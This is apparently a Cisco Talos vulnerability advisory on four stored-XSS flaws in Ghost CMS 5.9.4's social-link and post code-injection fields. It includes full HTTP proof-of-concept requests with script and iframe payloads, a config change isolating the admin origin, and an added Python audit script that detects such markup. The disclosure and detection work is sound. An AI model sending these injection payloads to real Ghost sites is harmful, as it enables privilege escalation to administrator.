Talos Vulnerability Report

TALOS-2022-1686

Ghost Foundation Ghost Post Creation insecure default installation vulnerability

January 19, 2023
CVE Number

CVE-2022-47194, CVE-2022-47195, CVE-2022-47196, CVE-2022-47197

SUMMARY

An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary JavaScript into posts, which allows privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request that injects JavaScript into a post and then trick an administrator into visiting that post.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Ghost Foundation Ghost 5.9.4

PRODUCT URLS

Ghost - http://www.ghost.org

CVSSv3 SCORE

9.0 - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

CWE

CWE-453 - Insecure Default Variable Initialization

DETAILS

Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to members and supports a number of integrations with external services.

Ghost CMS separates users into four groups (five, if including the site owner) of increasing privilege: Contributor, Author, Editor and Administrator. Contributor users have the least privilege and are allowed to create, but not publish, posts. All users have the ability to include social media links, as well as a few other pieces of information, that will be included on their posts and author pages. A stored XSS vulnerability exists in a number of these fields, and it can be leveraged for anything from basic attacks on users to full privilege escalation. As with any XSS, it requires a target user with the correct access level to access the affected resources while logged in in order to trigger the injected JavaScript. The vulnerabilities listed here can be triggered when a higher-level user simply previews or visits any post by the malicious user, as these social links seem to be included in all of a user’s posts. We have confirmed that a full privilege escalation to administrator can be achieved with the correct JavaScript payload.

Separating the admin domain, as documented at https://ghost.org/docs/config/#admin-url, prevents this type of vulnerability from being exploited to perform privileged API calls (modifying a user’s group, adding users, etc.), because the injected script then no longer runs on the same origin as the admin API. However, in default installations, these vulnerabilities can be used for privilege escalation via XSS. Essentially this means that, in default installations of Ghost CMS, users that can author pages and administrator users have the same privileges.
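The configuration change the paragraph above refers to, shown here as an added illustration rather than text from the advisory or from Ghost’s own documentation: in a default install the "admin" block is absent and the admin panel is served from the same origin as the public site ("url"). Setting "admin.url" (a documented Ghost configuration key) to a distinct hostname moves the admin panel and its API to a separate origin. The hostnames below are placeholders, and, as the advisory states, this limits what an injected script can reach rather than removing the stored XSS itself.

```json
{
  "url": "https://example.com",
  "admin": {
    "url": "https://admin.example.com"
  }
}
```

This goes in the active config file (for example config.production.json); both hostnames must resolve to the Ghost instance, and the admin one should not be the hostname on which contributor-authored posts are served.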

CVE-2022-47194 - Twitter

A stored XSS vulnerability exists in the twitter field for a user:

PUT /ghost/api/admin/users/632e1c14c8b0a2000e53cf2e/?include=roles HTTP/1.1
Host: localhost:3001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Ghost-Version: 5.12
App-Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 104
Origin: http://localhost:3001
DNT: 1
Connection: close
Referer: http://localhost:3001/ghost/
Cookie: ghost-admin-api-session=...
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"users":[{"twitter":"</script><script>alert('XSS')</script>"}]}

CVE-2022-47195 - Facebook

A stored XSS vulnerability exists in the facebook field for a user:

PUT /ghost/api/admin/users/632e1c14c8b0a2000e53cf2e/?include=roles HTTP/1.1
Host: localhost:3001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Ghost-Version: 5.12
App-Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 69
Origin: http://localhost:3001
DNT: 1
Connection: close
Referer: http://localhost:3001/ghost/
Cookie: ghost-admin-api-session=...
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"users":[{"facebook":"</script><script>alert('XSS')</script>"}]}

CVE-2022-47196 - codeinjection_head

A stored XSS vulnerability exists in the codeinjection_head for a post:

POST /ghost/api/admin/posts/ HTTP/1.1
Host: localhost:3001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Ghost-Version: 5.12
App-Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 144
Origin: http://localhost:3001
DNT: 1
Connection: close
Referer: http://localhost:3001/ghost/
Cookie: ghost-admin-api-session=...
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"posts":[{"title":"My Test Post",
"codeinjection_head":"<iframe onload=\"alert('XSS')\" />",
"authors":[{"id":"632e1c14c8b0a2000e53cf2e"}]}]}

CVE-2022-47197 - codeinjection_foot

A stored XSS vulnerability exists in the codeinjection_foot for a post:

POST /ghost/api/admin/posts/ HTTP/1.1
Host: localhost:3001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Ghost-Version: 5.12
App-Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 172
Origin: http://localhost:3001
DNT: 1
Connection: close
Referer: http://localhost:3001/ghost/
Cookie: ghost-admin-api-session=...
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"posts":[{"title":"My Test Post",
"codeinjection_head":null,
"codeinjection_foot":"<iframe onload=\"alert('XSS')\" />",
"authors":[{"id":"632e1c14c8b0a2000e53cf2e"}]}]}
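
The four requests above (CVE-2022-47194 through CVE-2022-47197) each write markup into a field that a non-administrator can set. The following audit script is an added example, not part of the Talos advisory and not Ghost’s own code; it walks user and post records shaped like the Admin API responses those requests target (users with roles included, posts with their authors) and reports two conditions: a twitter/facebook value containing markup, and a codeinjection_head/codeinjection_foot value on a post whose author lacks an Administrator or Owner role. The sample records, ids and role names used for the demonstration are constructed for the example; the role set treated as privileged is an assumption a site operator would adjust to their own policy.

```python
import re

# Fields the advisory identifies as stored-XSS sinks.
USER_SOCIAL_FIELDS = ("twitter", "facebook")
POST_INJECTION_FIELDS = ("codeinjection_head", "codeinjection_foot")

# Roles assumed to legitimately place raw HTML on the site. Everything else
# (Contributor, Author, Editor) counts as a non-administrator here.
PRIVILEGED_ROLES = {"Administrator", "Owner"}

# A Twitter/Facebook handle or URL never legitimately contains markup, so a
# '<' or an inline event-handler attribute is enough to flag the value.
MARKUP_RE = re.compile(r"<|\bon[a-z]+\s*=", re.IGNORECASE)


def user_roles(user):
    """Set of role names attached to a user record (as with ?include=roles)."""
    return {role.get("name") for role in user.get("roles", [])}


def audit_users(users):
    """Flag social-link fields (CVE-2022-47194/-47195) that contain markup."""
    findings = []
    for user in users:
        for field in USER_SOCIAL_FIELDS:
            value = user.get(field) or ""
            if MARKUP_RE.search(value):
                findings.append({
                    "kind": "social_field_markup",
                    "user_id": user.get("id"),
                    "field": field,
                    "roles": sorted(user_roles(user)),
                })
    return findings


def audit_posts(posts, users):
    """Flag code-injection fields (CVE-2022-47196/-47197) on posts that have a
    non-privileged author. Administrators set these fields legitimately, so
    only a set field combined with a low-privilege author is reported."""
    users_by_id = {u.get("id"): u for u in users}
    findings = []
    for post in posts:
        for field in POST_INJECTION_FIELDS:
            if not post.get(field):
                continue  # null or empty: nothing injected
            for author_ref in post.get("authors", []):
                author = users_by_id.get(author_ref.get("id"), {})
                if not (user_roles(author) & PRIVILEGED_ROLES):
                    findings.append({
                        "kind": "codeinjection_by_unprivileged_author",
                        "post_id": post.get("id"),
                        "field": field,
                        "author_id": author_ref.get("id"),
                        "roles": sorted(user_roles(author)),
                    })
    return findings


def run_audit(users, posts):
    """Run both checks; an empty list means nothing suspicious was found."""
    return audit_users(users) + audit_posts(posts, users)


# Constructed sample data (not real site content). Ids are placeholders.
SAMPLE_USERS = [
    {"id": "u-admin-1", "name": "Site Admin", "twitter": "@example",
     "facebook": None, "roles": [{"name": "Administrator"}]},
    {"id": "u-contrib-1", "name": "Guest Writer",
     "twitter": "</script><script>alert('XSS')</script>",
     "facebook": "https://www.facebook.com/example",
     "roles": [{"name": "Contributor"}]},
]
SAMPLE_POSTS = [
    # An administrator adding an analytics snippet is the intended use.
    {"id": "p-1", "title": "Release notes",
     "codeinjection_head": '<script src="/analytics.js"></script>',
     "codeinjection_foot": None, "authors": [{"id": "u-admin-1"}]},
    # The same field set by a Contributor is the vector from the advisory.
    {"id": "p-2", "title": "My Test Post", "codeinjection_head": None,
     "codeinjection_foot": '<iframe onload="alert(\'XSS\')" />',
     "authors": [{"id": "u-contrib-1"}]},
]

if __name__ == "__main__":
    for finding in run_audit(SAMPLE_USERS, SAMPLE_POSTS):
        print(finding)
```

Run against the sample data it reports exactly two findings: the Contributor’s twitter field and the Contributor-authored post’s codeinjection_foot; the administrator’s analytics snippet is left alone. Pointed at a real export, the same two checks give an operator a quick inventory of where markup has been stored by accounts that should not be able to store it.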

TIMELINE

2022-10-26 - Initial Vendor Contact

2022-10-26 - Vendor Disclosure

2022-10-31 - Vendor doesn’t consider issue a security problem

2022-11-22 - Vendor still doesn’t consider the issue a security problem

2023-01-05 - Revised advisory sent to vendor

2023-01-12 - Vendor still doesn’t see issue as security issue

2023-01-19 - Public release

Credit

Discovered by Dave McDaniel of Cisco Talos.